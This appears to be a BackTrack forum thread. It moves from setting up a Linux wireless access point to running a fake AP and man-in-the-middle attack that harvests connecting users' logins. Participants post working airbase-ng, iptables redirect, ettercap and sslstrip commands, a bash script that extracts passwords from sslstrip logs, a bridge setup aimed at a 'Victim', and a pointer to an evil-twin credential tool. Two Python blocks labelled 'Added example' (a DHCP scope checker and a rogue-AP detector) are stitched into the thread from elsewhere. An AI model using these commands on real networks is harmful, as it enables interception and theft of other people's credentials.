
Thread: Make backtrack as an AP

  1. #1
    Just burned his ISO
    Join Date
    Apr 2011
    Location
    Norway
    Posts
    13

    Default Make backtrack as an AP

    I would like to know how I could make BackTrack act as an access point for wireless and cable connections.

    Scenario:
    I am connected to a wireless network with the computer running BT5. I want to share that network with other computers, with or without a wireless NIC. In my usage it will be both.

    I have tried to set up an AP with Gerix Wifi Cracker, but those are fake APs that don't work properly.

    And if this can be done, can I add filters that will not allow Facebook to be accessed, and maybe a bandwidth limiter, etc.?

    Help appreciated

  2. #2
    Just burned his ISO
    Join Date
    Apr 2011
    Location
    Norway
    Posts
    13

    Default Re: Make backtrack as an AP

    I have been trying to make an AP using hostapd, but I can't seem to get my NICs into Master mode. I have an ALFA AWUS036H and an Atheros AR2425.
    The Atheros uses ath5k.
    The Alfa uses rtl8187.

    Does anyone know if the ALFA can be set in Master mode? I've read that it is not supported yet.
    Is it good or possible to use MadWiFi to make an AP?

  3. #3
    Junior Member M00kaw's Avatar
    Join Date
    Oct 2010
    Location
    127.0.0.1
    Posts
    47

    Default Re: Make backtrack as an AP

    I've played around with it for a little while, and this is what I came up with:
    Setting up a WiFi AP in BackTrack Linux 5

    # I'm using two wireless interfaces:
    # Interface Chipset Driver
    #
    # wlan0 Broadcom b43 - [phy0]
    # wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
    #
    # I'm connected to a wireless network with wlan0
    # My wlan1 is used to create the AP (an Alfa wireless USB dongle)
    #
    #install dhcp-server
    apt-get install dhcp3-server

    #backup the std. configuration-file (dhcp3-server reads /etc/dhcp3/dhcpd.conf)
    mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

    #create a new dhcpd.conf with class C IP and /25 subnet
    nano /etc/dhcp3/dhcpd.conf

    #insert the following:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.130 192.168.2.140;
    }
    #the dhcpd.conf ends here


    #fire up the accesspoint
    #create monitor-mode mon0
    airmon-ng start wlan1
    airbase-ng -e "AP_NAME" -c 9 mon0
    # -e for name, -c for channel, on the monitor mon0
    # airbase-ng stays in the foreground: run it in its own terminal (or background it) before continuing

    #this will create a virtual interface called at0
    #configure at0 with the gateway address from dhcpd.conf

    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128

    #add a route for the traffic
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    #192.168.2.128 == the network address
    #255.255.255.128 == the subnet mask, which is /25
    #192.168.2.129 == the gateway, aka the first available IP address on the network

    #now point the dhcp3-server at the new dhcpd.conf

    dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0

    # run the following commands to flush all iptables rules and set up new ones

    iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain &&
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE &&
    iptables --append FORWARD --in-interface at0 -j ACCEPT &&
    echo 1 > /proc/sys/net/ipv4/ip_forward

    #I wrote it this way, so that it's easy to put into a bash-script
    #WiFi AP is now set up and should work..


    # Links:
    # http://www.howtoforge.com/nat_iptables
    # http://adaywithtape.blogspot.com/200...irbase-ng.html
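    Added example, not from the post or from ISC dhcpd: a sanity check of the subnet block above, computed from the subnet line with Python's ipaddress module so the hand-typed options (mask, broadcast, router, range) can be verified against it before dhcpd3 is started. It assumes the at0 address is the one used in the post (192.168.2.129) and parses only the directives the post uses.

```python
import ipaddress
import re

# The subnet block from the post, embedded here so the check runs offline.
DHCPD_CONF = """
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}
"""

def parse_subnet(conf):
    """Extract the first subnet block; only the directives the post uses are parsed."""
    m = re.search(r"subnet\s+([\d.]+)\s+netmask\s+([\d.]+)\s*\{(.*?)\}", conf, re.S)
    if not m:
        raise ValueError("no subnet block found")
    body = m.group(3)
    # strict=True rejects a subnet line whose host bits are set (e.g. 192.168.2.129/25)
    scope = {"network": ipaddress.ip_network(f"{m.group(1)}/{m.group(2)}", strict=True)}
    for key in ("subnet-mask", "broadcast-address", "routers"):
        opt = re.search(rf"option\s+{key}\s+([\d.]+)\s*;", body)
        scope[key] = ipaddress.ip_address(opt.group(1)) if opt else None
    rng = re.search(r"range\s+([\d.]+)\s+([\d.]+)\s*;", body)
    if not rng:
        raise ValueError("no range directive in subnet block")
    scope["range"] = (ipaddress.ip_address(rng.group(1)), ipaddress.ip_address(rng.group(2)))
    return scope

def check_scope(scope, at0_address):
    """Return the list of inconsistencies; an empty list means the scope is sound."""
    net = scope["network"]
    problems = []
    if scope["subnet-mask"] != net.netmask:
        problems.append(f"subnet-mask should be {net.netmask}")
    if scope["broadcast-address"] != net.broadcast_address:
        problems.append(f"broadcast-address should be {net.broadcast_address}")
    # the routers option must be the address given to at0, and that address must be in the subnet
    if scope["routers"] != ipaddress.ip_address(at0_address) or scope["routers"] not in net:
        problems.append("routers must be the at0 address, inside the subnet")
    lo, hi = scope["range"]
    if lo > hi or lo not in net or hi not in net:
        problems.append("range is not inside the subnet")
    elif scope["routers"] is not None and lo <= scope["routers"] <= hi:
        problems.append("range overlaps the router address")
    return problems
```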

  4. #4
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    7

    Default Re: Make backtrack as an AP

    I've used this setup and the users who connect to the AP can access the internet and I can watch what's happening on Wireshark.

    I'm trying to get the logins and passwords used so I searched google and came across a very similar setup in addition to using:

    Code:
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    &
    Code:
    ettercap -T -q -p -i at0 // //
    sslstrip -a -k -f
    The problem is that when I add those commands to my setup, the users lose connectivity to the internet.

    I also removed the # from the etter.conf so it looks like this:
    Code:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    Any idea what the problem is? Again I'm using the same setup M00kaw showed in his post.
    Last edited by masry; 07-11-2011 at 08:53 PM.

  5. #5
    Junior Member M00kaw's Avatar
    Join Date
    Oct 2010
    Location
    127.0.0.1
    Posts
    47

    Default Re: Make backtrack as an AP

    Actually - I had the exact same issue with ettercap ... Piece of s*** won't work :-P

    So, what I did was to save the sslstrip.log and search it for username/passwords ...
    This was done by a part of the script that ComaX made for sniffing traffic..

    It could look something like this (again, all credit goes to comaX):

    #!/bin/bash
    echo "Do you want to save passwords to a file? (Y=keep)"
    echo "(If you want to keep it, it will be saved in /root/filename.pass.txt)"
    read -e keeppd
    if [[ $keeppd = "Y" || $keeppd = "y" ]] ; then # double brackets because double condition. || signifies "or"
    cat /root/sslstrip.log |
    awk -F "&" '!/GET/ && !/if/ && !/header/ && !/^[0-9]/ && !/</ && /[PpEeUuLlCc_][A-Za-z]*=[A-Za-z0-9.%_-]*/ {if (NF >= 2) print $0}' |
    awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
    egrep -a -i "pwd=|pass=|passwd=|password=|textbox=|email=|user=|username=|login=|credential=|_user|_pwd=|email_address=" |
    awk -F "=" '{if (length($2) < 3) print "\b"; else if ($1 ~/[Pp]/) print "Password = " $2"\n"; else print "Login =", $2}' >& /root/filename.pass.txt #we do it all over again... There should be a way not to re-do that...
    if [ -f "/root/filename.pass.txt" ]; then #check if it exists
    echo "Passwords saved !" #it does
    else echo "Error while saving passwords" #it does not
    fi
    else echo "Password saving skipped."
    fi
    rm /root/filename.txt
    echo -e "\nTemporary files deleted."

  6. #6
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default Re: Make backtrack as an AP

    Quote Originally Posted by masry View Post
    I also removed the # from the etter.conf so it looks like this:
    Code:
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    You need to recomment redir_command_off.
    You may also want to flush your iptables, and you can then re-enter the command manually.

  7. #7
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    7

    Default Re: Make backtrack as an AP

    @ M00kaw, I haven't tried the script yet. I'm trying to figure out how this whole thing works before I use scripts. But if I can't get this setup to work I might just use the script.

    @ hhmatt, I've tried re-commenting redir_command_off so now it looks like this
    Code:
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    and also edited a part of etter.conf based on a recommendation by someone (Google search), so now it looks like this:
    Code:
    ec_uid = 0
    ec_gid = 0
    Unfortunately, the user of the AP loses connectivity after I insert
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I even disconnected my test subjects (laptop & ipad) from the AP and reconnected again, but still couldn't connect to the internet again.

    Here is a summary of my setup:

    dhcpd.conf
    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.130 192.168.2.140;
    }
    Code:
    root@bt:~# airmon-ng start wlan1
    root@bt:~# airbase-ng -e "wifi" -c 9 mon0
    
    
    10:58:27  Created tap interface at0
    10:58:27  Trying to set MTU on at0 to 1500
    10:58:27  Trying to set MTU on mon0 to 1800
    10:58:27  Access Point with BSSID 00:A0:AA:AA:AA:5A started.
    
    root@bt:~# ifconfig at0 up
    root@bt:~# ifconfig at0 192.168.2.129 netmask 255.255.255.128
    root@bt:~# route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
    
    Internet Systems Consortium DHCP Server V3.1.3
    Copyright 2004-2009 Internet Systems Consortium.
    All rights reserved.
    For info, please visit https://www.isc.org/software/dhcp/
    Wrote 2 leases to leases file.
    Listening on LPF/at0/00:A0:AA:AA:AA:5A/192.168.2.128/25
    Sending on   LPF/at0/00:A0:AA:AA:AA:5A/192.168.2.128/25
    Sending on   Socket/fallback/fallback-net
    
    root@bt:~# iptables --flush && iptables --table nat --flush && iptables --delete-chain && 
    iptables --table nat --delete-chain && 
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE && 
    iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward
    After the last command I can have my test subjects connect to the AP and have internet connectivity.

    Based on what I found on google I need to add two more lines to get etter and sslstrip working with this setup.

    I entered each command separately so I can know which one breaks the connection. First I insert
    Code:
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    (The 192.168.1.1 is my home gateway)

    After inserting this command my ipad and laptop can browse the internet. Until
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    which kills the AP's internet. I searched Google and compared the command I'm using, and it matches other examples, so I don't think it's a typo in the command or something. Hmm, any more ideas I can try with this setup?

    Thanks
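    From the defender's side of this: the output above shows the airbase-ng network coming up ('wifi', channel 9, BSSID 00:A0:AA:AA:AA:5A), which is exactly what a wireless IDS or a periodic scan should flag as an evil twin if 'wifi' is a managed network. Added example, not from the thread or any tool it mentions; the scan records and the inventory of sanctioned APs are constructed, and the clones are modelled as open (OPN) because the thread's airbase-ng commands set no encryption.

```python
from collections import namedtuple

# Constructed scan records (not real captures): the sanctioned APs are invented;
# the "wifi" clone reuses the BSSID, ESSID and channel printed by airbase-ng in
# post #7, and "AP_NAME" is the ESSID from post #3 with a made-up BSSID.
AP = namedtuple("AP", "bssid channel privacy essid")
SCAN = [
    AP("00:1A:2B:3C:4D:5E", 1, "WPA2", "wifi"),     # sanctioned (assumed)
    AP("00:A0:AA:AA:AA:5A", 9, "OPN", "wifi"),      # airbase-ng clone from post #7
    AP("00:11:22:33:44:55", 9, "OPN", "AP_NAME"),   # post #3's ESSID, constructed BSSID
    AP("00:1A:2B:3C:4D:5F", 11, "WPA2", "guest"),   # sanctioned (assumed)
]

# Defender's inventory (assumed): managed ESSID -> (expected privacy, sanctioned BSSIDs).
INVENTORY = {
    "wifi": ("WPA2", {"00:1A:2B:3C:4D:5E"}),
    "guest": ("WPA2", {"00:1A:2B:3C:4D:5F"}),
}

def find_rogue_aps(scan, inventory):
    """Return (severity, bssid, essid, reason) findings, highest severity first.

    Two evil-twin signals are checked for every managed ESSID: a BSSID the
    inventory does not sanction, and weaker privacy than the inventory expects
    (an open clone of a WPA2 network). ESSIDs not in the inventory are reported
    at 'info' so an analyst can triage them without drowning in noise.
    """
    findings = []
    for ap in scan:
        if ap.essid not in inventory:
            findings.append(("info", ap.bssid, ap.essid,
                             f"unmanaged ESSID seen on channel {ap.channel}"))
            continue
        expected_privacy, sanctioned = inventory[ap.essid]
        if ap.bssid not in sanctioned:
            findings.append(("high", ap.bssid, ap.essid,
                             f"unsanctioned BSSID on channel {ap.channel}"))
        if ap.privacy != expected_privacy:
            findings.append(("high", ap.bssid, ap.essid,
                             f"privacy {ap.privacy}, inventory expects {expected_privacy}"))
    rank = {"high": 0, "info": 1}
    return sorted(findings, key=lambda f: (rank[f[0]], f[1], f[3]))

if __name__ == "__main__":
    for severity, bssid, essid, reason in find_rogue_aps(SCAN, INVENTORY):
        print(f"[{severity}] {essid} {bssid}: {reason}")
```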

  8. #8
    Member shadowzero's Avatar
    Join Date
    Jun 2011
    Location
    ${HOME}
    Posts
    94

    Default Re: Make backtrack as an AP

    Quote Originally Posted by masry View Post
    After inserting this command my ipad and laptop can browse the internet. Until
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    which kills the AP's internet. I searched Google and compared the command I'm using, and it matches other examples, so I don't think it's a typo in the command or something. Hmm, any more ideas I can try with this setup?
    After you insert this command, you should run sslstrip. sslstrip listens on port 10000 by default. Since you are now redirecting connections to port 80 to port 10000, if nothing is listening on port 10000 then your wireless clients won't be able to get anywhere.

  9. #9
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    7

    Default Re: Make backtrack as an AP

    @ shadowzero, thanks very much for the tip. That fixed the issue and now I got the AP and sslstrip playing nice together.
    @ M00kaw and hhmatt thank you for your support.

    Since I was having problems with this setup I searched for another way to create an AP with airbase-ng and came across a tutorial on securitytube (Wireless Lan Security Megaprimer Part 12: Man-In-The-Middle Attack) which uses a different method and also uses burp suite which looks pretty cool.

    I tried to get it to work on BT5 GNOME 32-bit and I'm running into an error:

    can't add wlan0 to bridge mitm: Operation not supported
    Here is my setup:
    |Router| ---wlan0---- |backtrack| -------wlan1(mon0)--------|Victim|

    Steps I've taken:

    I connect to the internet using my built-in wireless card (wlan0), and my Alfa AWUS036H card is wlan1.

    Code:
    root@bt:-# ifconfig wlan1 up 
    root@bt:-# airmon-ng start wlan1 
    root@bt:-# iwconfig wlan1 channel 1 
    root@bt:-# iwconfig mon0 channel 1 
    root@bt:-# airbase-ng --essid test mon0 
    root@bt:-# ifconfig at0 up 
    root@bt:-# brctl addbr mitm 
    root@bt:-# brctl addif mitm at0 
    root@bt:-# brctl addif mitm wlan0
    And again, when I run that last command I get the error message. Did anyone try this kind of setup and get it to work on an installed BT, not a VM?

    I don't want to open another thread since this one got the right title and also would have two methods of creating an AP on backtrack if I get it to work properly.

    Thanks,

  10. #10
    Senior Member
    Join Date
    Dec 2010
    Posts
    127

    Default Re: Make backtrack as an AP

    Check out my script easy-creds. I just posted v3.5 for BT5 on Sourceforge

    http://sourceforge.net/projects/easy-creds/

    It has a regular FakeAP, a FakeAP Eviltwin & a Karmetasploit attack.

    I have the same Alfa card as you so I know it'll work.

    Happy Hunting!

    JB
